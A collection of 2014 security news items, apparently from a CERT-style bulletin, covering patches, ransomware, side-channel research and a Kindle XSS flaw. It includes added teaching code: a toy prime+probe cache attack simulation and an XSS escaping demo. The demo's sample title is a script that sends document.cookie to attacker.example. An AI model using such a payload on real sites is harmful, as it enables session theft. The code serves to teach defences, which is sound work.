Apple fixes seven Safari security flaws

Creation date

ID: IRCNE2014082293
Date: 2014-08-19

According to "ITPro", Apple has released a security update that fixes seven vulnerabilities in WebKit, the rendering engine behind Safari.
The update ships as Safari 6.1.6 and Safari 7.0.6 and is available from the Apple support page for OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5 and OS X Mavericks v10.9.4.
According to Apple, the flaws are memory corruption issues in WebKit and have been addressed through improved memory handling.
The US-based company said: "Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution."
Apple declined to say whether the vulnerabilities have been exploited in the wild: "For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available."
Nonetheless, the United States Computer Emergency Readiness Team (US-CERT) urges IT managers to install the updates as a matter of urgency.
"Users and administrators are encouraged to review Apple security update... and apply the necessary updates," its advisory states.
Problems with WebKit are not uncommon. It is the open-source engine behind Safari and other OS X applications such as Mail, and Google Chrome was also WebKit-based until Google forked it into Blink in 2013.

Tags

Heartbleed exposes weaknesses in hardware design

Creation date

Number: IRCNE2014082294
Date: 2014-08-19

According to "techworld", Heartbleed may have been a software bug, but it highlighted glaring weaknesses in existing hardware architectures, which remain vulnerable to attacks on data held in memory, a university researcher said this week.
Data is vulnerable to attackers both in transit and while it sits in computer memory, said Ruby Lee, professor of engineering at Princeton University's Department of Electrical Engineering, in a presentation at the Hot Chips conference.
The weak point is memory, and in particular the cache: the small, fast buffer where data resides temporarily before it is processed or written to storage.
Securing memory was a hot topic among chip experts at the forum, and Heartbleed sparked discussions on how attackers could access data from memory, storage and interconnects. Chip makers talked about hardware being the first line of defense against such attacks and proposed techniques to scramble data and secure keys within a chip. A research project at Princeton funded by the U.S. Department of Homeland Security recommended a new architecture that could secure memory and cache.
Heartbleed was a critical defect in affected versions of the OpenSSL library, which provides the encrypted communication used across the Internet and private networks. It affected servers, networking gear and appliances, and hardware makers have since issued patches to protect their systems.
"Lots of people have talked about the attacks, but very few people have talked about the solutions," Lee said. "The hardware is still leaking out your secret keys all the time. Every single piece of hardware that has a cache is vulnerable to cache-side channel leakage."
Software attacks that target hardware directly are hard to mount, but side-channel attacks, which infer secrets from observable behaviour such as cache timing, are dangerous, Lee said.
To mitigate such attacks, Lee and researchers at Princeton have redesigned the cache so that the traces a victim leaves behind are effectively wiped out, making side-channel attacks difficult to carry out. The architecture, called Newcache, could replace the exposed caches in today's systems.
Newcache is organized like a regular cache, but uses a dynamic, randomized mapping of memory addresses to cache lines. Because an attacker can no longer predict which cache line a given address occupies, cache activity cannot be correlated with key bits, which is what makes mapping the cache and extracting data hard.
Newcache is ready to implement, and the added security does not hurt performance, Lee said. Memory typically slows down when new features such as ECC error correction are added, but benchmarks of Newcache actually showed improvements in system performance.
It could take years for chip and system makers to change memory features, but chip makers need to start thinking about securing data within systems, Lee said.
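An added simulation of the correlation Lee describes, written for this page (it is not Princeton's Newcache code and not from the talk): a victim whose table lookup depends on a key bit, and an attacker running prime+probe against a small direct-mapped cache. Under the conventional fixed address-to-set mapping the attacker recovers every key bit; under Newcache-style random placement of missing lines the same attacker does no better than guessing. The cache size, the addresses, the table layout and the key are all constructed for the demonstration, and the random-placement model is a simplification of Newcache's real mapping and remapping policy.

```python
import random

NSETS = 16              # direct-mapped cache with one line per set (constructed)
VICTIM_TABLE = 0x1000   # constructed: victim lookup table, addresses in cache-line units
STRIDE = 8              # constructed: key bit b makes the victim touch VICTIM_TABLE + b*STRIDE
ATTACKER_BUF = 0x8000   # constructed: attacker-controlled buffer, one line per set
# Constructed 64-bit key with exactly 32 one-bits, so a blind guess scores about 0.5.
KEY = bytes.fromhex("a5c3f00f5a3c0ff0")


def key_bits(key):
    """Key as a list of bits, most significant bit of each byte first."""
    return [(byte >> (7 - i)) & 1 for byte in key for i in range(8)]


class Cache:
    """Single-level direct-mapped cache model.

    Conventional mode maps an address to set (addr % NSETS), a function any
    attacker can compute.  Randomized mode imitates the Newcache idea: a line
    that misses is placed in a uniformly random set, so the attacker cannot
    predict which set a victim address will land in.
    """

    def __init__(self, randomized, rng):
        self.randomized = randomized
        self.rng = rng
        self.lines = [None] * NSETS   # set index -> (owner, addr) currently resident
        self.placed = {}              # (owner, addr) -> set it was last placed in

    def _set_for(self, key):
        if not self.randomized:
            return key[1] % NSETS               # conventional, fixed mapping
        s = self.placed.get(key)
        if s is not None and self.lines[s] == key:
            return s                            # still resident where it was placed
        return self.rng.randrange(NSETS)        # miss: random placement

    def access(self, owner, addr):
        """Touch one line; return True on a hit, False on a miss (the line is filled)."""
        key = (owner, addr)
        s = self._set_for(key)
        hit = self.lines[s] == key
        self.lines[s] = key
        self.placed[key] = s
        return hit


def victim_step(cache, bit):
    """Key-dependent table lookup: the access pattern, not the data, leaks the bit."""
    cache.access("victim", VICTIM_TABLE + bit * STRIDE)


def prime(cache):
    """Attacker fills every set with one of its own lines."""
    for i in range(NSETS):
        cache.access("attacker", ATTACKER_BUF + i)


def probe(cache):
    """Indices of attacker lines that missed, i.e. were evicted since prime()."""
    return [i for i in range(NSETS) if not cache.access("attacker", ATTACKER_BUF + i)]


def recover_key_bits(cache):
    """Prime+probe once per key bit.  The attacker knows the victim's table layout
    (it is in public code) and assumes the conventional address-to-set formula."""
    set_for_one = (VICTIM_TABLE + STRIDE) % NSETS
    guesses = []
    for bit in key_bits(KEY):
        prime(cache)
        victim_step(cache, bit)
        guesses.append(1 if set_for_one in probe(cache) else 0)
    return guesses


def attack_accuracy(randomized, seed=1):
    """Fraction of key bits the attacker recovers against the given cache type."""
    cache = Cache(randomized, random.Random(seed))
    truth = key_bits(KEY)
    guesses = recover_key_bits(cache)
    return sum(g == t for g, t in zip(guesses, truth)) / len(truth)


if __name__ == "__main__":
    print("conventional mapping, fraction of key bits recovered:", attack_accuracy(False))
    print("randomized mapping,   fraction of key bits recovered:", attack_accuracy(True))
```

Running the file prints both accuracies. The point of the model is the attacker's decision rule rather than cache fidelity: with the conventional mapping the set the victim touches is a deterministic function of an address the attacker can read off the victim's code, so each probe miss names a key bit; with randomized placement that function does not exist, so the evictions the attacker sees carry no information about the key. Real Newcache also specifies when lines are remapped and how this interacts with replacement, which the model leaves out.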

Tags

'Reveton' ransomware upgraded with powerful password stealer

Creation date

Number: IRCNE2014082295
Date: 2014-08-19

According to "techworld", Reveton, a type of malware that falsely warns users they have broken the law and demands payment of a "fine", has been upgraded with powerful password-stealing functions, according to Avast.
The malware often infects computers via drive-by download, when a person visits a website rigged to automatically exploit software vulnerabilities. Once the computer is locked the user is helpless, with Reveton demanding a ransom of a few hundred dollars payable through various web-money services.
Avast analyzed a version of Reveton that carries a module containing the Pony password stealer, which can also steal virtual currency such as bitcoin stored on the computer.
Pony can extract and decrypt the stored credentials of FTP, VPN and email clients, web browsers and instant-messaging programs.
The version of Reveton analyzed by Avast also carries a second password stealer from the Papras family of malware. It is less capable than Pony but can disable security software, the company wrote on its blog.

Tags

Vulnerability in popular Joomla e-commerce extension puts online shops at risk

Creation date

Number: IRCNE2014092316
Date: 2014-09-14

According to "techworld", a critical vulnerability in a popular e-commerce extension for the Joomla content management system allows attackers to gain super-admin privileges on sites that run the software.
The VirtueMart extension, which lets users set up online shops on their websites, has been downloaded more than 3.5 million times, said Marc-Alexandre Montpas, a researcher at web security firm Sucuri, in a blog post on Wednesday. "With super-admin access, the attacker has full control of the site and database."
The issue was discovered last week and patched in VirtueMart 2.6.10, released on Sept. 4. The VirtueMart page in the Joomla extensions catalogue advises that "everyone using a version lower than 2.6.10 should update as soon as possible for security reasons."
"VirtueMart uses Joomla's JUser class 'bind' and 'save' methods to handle user accounts information," Montpas said. "We actually think the problem is on the Joomla class itself, so we will not disclose any more details."

Tags

VMware patches third-party components in vSphere platform

Creation date

Number: IRCNE2014092317
Date: 2014-09-16

According to “techworld”, VMware has updated third-party libraries and components used by its vSphere server virtualization platform.
The company released vCenter Server 5.5 Update 2, which includes a patch for a remote code execution vulnerability in the Apache Struts web framework bundled with the product.
The same vCenter Server release updates the bundled Apache Tomcat to version 7.0.52, originally released in February, which fixes two denial-of-service vulnerabilities and one information disclosure vulnerability.
vCenter Server 5.5 Update 2 and vCenter Update Manager 5.5 Update 2 also move the bundled Java Runtime Environment (JRE) to 1.7 Update 55, released in April, which contains patches for 37 security vulnerabilities.
The VMware vSphere Hypervisor (ESXi) received a patch, ESXi550-201409101-SG, that updates the included GNU C Library (glibc) to address two buffer overflow vulnerabilities that can trigger denial-of-service conditions.

Tags

Symantec folds nine Norton products into one service

Creation date

ID: IRCNE2014082295
Date: 2014-08-20

According to “ComputerWorld”, Symantec will consolidate its cluttered Norton line of security software, folding nine products into one online service that can be used across desktop computers and mobile devices.
The product, in beta now, will simply be called "Norton Security" and cost $79 a year when it goes on sale in North America on Sept. 23, said Gerry Egan, senior director of product management. It replaces Norton Internet Security, Norton AntiVirus and Norton 360, among others.
Symantec, one of the largest security vendors, has been working for more than a year to revise its product line as it faces strong competition in the low-margin consumer antivirus business.
Over the years, Symantec added new products as new threats emerged, but people had trouble figuring out which product was the right one for them.
"What we realized was we actually ended up confusing a lot of customers," Egan said.
Overall, Symantec has aimed to make Norton Security an easy-to-manage online service along the lines of Netflix or iTunes. The user interface has been improved for simpler device management.
Consumers can sign up for a Norton Security online account and then download the appropriate product for Windows or Apple OS X computers, or Android or iOS mobile devices.
There will be a limit on the number of devices Norton Security can be used on. The limit hasn't been determined yet, Egan said, but it will aim to prevent abuse and should be appropriate for most customers.
Norton Security has the usual antivirus, antispyware and spam monitoring functions. Symantec will offer a cloud-based backup feature as an option.
Pricing for the backup feature hasn't been set yet, but Egan said it will be generally the same as in other Norton products, starting around $10 for 25 GB of storage.
Customers on versions of Norton due to be retired won't be forced off the old products, although Symantec will encourage them to move to the latest version, Egan said.
Egan said Symantec expects to release Norton Security in Europe around early October and then later in Asia Pacific.


Tags

Hack attack: Apps can spy on other apps

Creation date

Number: IRCNE2014082297
Date: 2014-08-23

According to "zdnet", US researchers have discovered a weakness that may exist across Android, Windows and iOS, and could allow popular services such as Gmail to be compromised.
Security researchers from the University of California, Riverside's Bourns College of Engineering and the University of Michigan identified a weakness believed to exist in all of those operating systems, which could allow an attacker to steal sensitive data through a malicious application.
The weakness was tested on an Android smartphone, but the researchers say the method should work on all of the platforms because each shares a similar feature: an application can observe another application's shared-memory usage. No tests have yet been conducted on the other systems.
The attack begins with the user installing a seemingly harmless application, such as a wallpaper app. Once installed, the app exploits a newly identified public side channel: the shared-memory statistics of another process, which can be read without any permission or privilege. The attacker reads the amount of shared memory a process is using, not its contents.
Changes in that figure are then monitored and correlated with what the team calls an "activity transition event": when the user opens a new screen in an app, for example to log into Gmail or to photograph a cheque for deposit through the Chase Bank app, the shared-memory figure changes in a characteristic way.
The attack has two requirements: it must happen in real time, such as at the moment the user is logging into Gmail, and it must be undetectable by the user, which is achieved through good timing.
The method succeeded "between 82 percent and 92 percent of the time" on six of the seven apps tested. Gmail, Chase Bank and H&R Block were among the applications successfully attacked; attacks on Gmail and on H&R Block each succeeded 92 percent of the time.
The only app that proved difficult to attack was Amazon, with a 48 percent success rate.

Tags

Adobe delays Acrobat patch

Creation date

Number: IRCNE2014092309
Date: 2014-09-09

According to "zdnet", Adobe has announced that a patch for Acrobat and Reader, scheduled for release on Tuesday, September 9, will not ship until the week of September 15.
The update will bring new versions of Reader and Acrobat for Windows and Mac that address one or more critical vulnerabilities, the exact nature of which remains unspecified for now.
The affected versions are Reader and Acrobat X 10.1.11 and earlier, and Reader and Acrobat XI 11.0.08 and earlier.

Tags

Kindle security vulnerability can 'compromise' Amazon accounts

Creation date

ID: IRCNE2014092319
Date: 2014-09-17

According to "ZDNet", a security vulnerability in Amazon's Kindle Library can be used to "compromise" an entire Amazon.com account, according to the researcher who found the flaw.
German researcher Benjamin Mussler published a proof of concept on his blog after Amazon, which had previously fixed the flaw, reintroduced it. Mussler said Amazon did not respond after he reported it the second time, which led him to disclose the flaw publicly.
The vulnerability is a cross-site scripting (XSS) flaw: script embedded in an e-book's metadata, such as its title, is rendered into the page unsanitized and executes automatically as soon as the victim opens the Amazon Kindle Library page on Amazon.com.
"As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised," Mussler said.
Anyone who uses Amazon's Kindle Library to store e-books or deliver them to a Kindle, he said, is affected by the bug.
Mussler warned that those who obtain e-books from untrustworthy sources, such as pirated copies of popular books, are at greater risk than those who buy through Amazon.com, since the attacker must get a crafted e-book into the victim's library.
The researcher said he first reported the vulnerability privately to Amazon in November 2013, and it was fixed with a relatively quick turnaround. But after the retailer rolled out a new version of the "Manage Your Kindle" web application, the bug was reintroduced.
"Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed," he said.

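The metadata-to-page path Mussler describes, as an added illustration written for this page (it is not Amazon's code and not the researcher's proof of concept): a library page rendered from book metadata, first by plain string concatenation and then with HTML escaping appropriate to where each value lands. The book records, the attacker host and the page markup are all constructed.

```python
import html

# Constructed metadata for an e-book from an untrusted source.  The "title" carries
# a script that would send the viewer's cookies to a hypothetical attacker host.
UNTRUSTED_BOOK = {
    "title": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    "author": "Anonymous",
}
SAFE_BOOK = {"title": "Gödel, Escher, Bach", "author": "Douglas R. Hofstadter"}


def render_library_vulnerable(books):
    """Builds the library page by string concatenation.  Metadata lands in the
    HTML verbatim, so a title that contains markup is parsed as markup."""
    rows = []
    for b in books:
        title, author = b["title"], b["author"]
        rows.append(f'<li data-title="{title}">{title} by {author}</li>')
    return "<ul>" + "".join(rows) + "</ul>"


def render_library_hardened(books):
    """Same page, but every metadata value is HTML-escaped at output time.
    html.escape with quote=True is correct for both a double-quoted attribute
    value and a text node, the two places the title is interpolated here."""
    rows = []
    for b in books:
        title = html.escape(b["title"], quote=True)
        author = html.escape(b["author"], quote=True)
        rows.append(f'<li data-title="{title}">{title} by {author}</li>')
    return "<ul>" + "".join(rows) + "</ul>"


def contains_live_script(page):
    """Coarse regression check: no <script> element may originate from metadata.
    Escaped text shows up as &lt;script&gt;, which this does not match."""
    return "<script" in page.lower()


if __name__ == "__main__":
    library = [UNTRUSTED_BOOK, SAFE_BOOK]
    print("vulnerable page executes script:", contains_live_script(render_library_vulnerable(library)))
    print("hardened page executes script:  ", contains_live_script(render_library_hardened(library)))
    print(render_library_hardened(library))
```

The regression Mussler reports, a fix that disappeared when the web application was rewritten, is what output encoding built into the templating layer (rather than applied at one call site) and a check like contains_live_script in the test suite are meant to prevent. Escaping must match the context: the example covers attribute values and text nodes, but a value placed inside a URL or a script block needs its own encoding. Marking the session cookies HttpOnly would additionally keep document.cookie out of reach of injected script, though it does not stop other actions such a script can take on the page.
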
Tags

Apple doubles-down on security, shuts out law enforcement from accessing iPhones, iPads

Creation date

ID: IRCNE2014092324
Date: 2014-09-20

According to "ZDNet", if the feds are after your iPhone or iPad, it probably won't be Apple's door they'll be knocking on.
After the PRISM scandal broke, the news threw Apple and other Silicon Valley companies under the bus over allegations that they knowingly participated in a secret surveillance program.
But that wasn't the case at all, as the recently released Yahoo documents showed. Yahoo was threatened with bankruptcy if it didn't comply with the U.S. government's data demands, which for the first time solidified the rebuttals from the nine named technology companies that they were not complicit in state surveillance.
Now Apple is going one step further, adjusting its encryption and security practices, and its privacy policy, to prevent law enforcement from cracking open its smartphone and tablet line-up.
Apple's new mobile operating system, iOS 8, released on Wednesday, lands with reworked encryption that forces law enforcement, federal agents and intelligence agencies to go to the device owner rather than to Apple.
The new encryption methods prevent even Apple from accessing data on a locked device, including the relatively small amount it was previously able to extract.
"Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data," the company said in its new privacy policy, updated Wednesday. "So it's not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8."
There are some caveats, however. For the iCloud data it stores, Apple still has the ability (and the legal responsibility) to turn over data it stores on its own servers, or third-party servers it uses to support the service.
iCloud data can include photos, emails, music, documents, and contacts.

Tags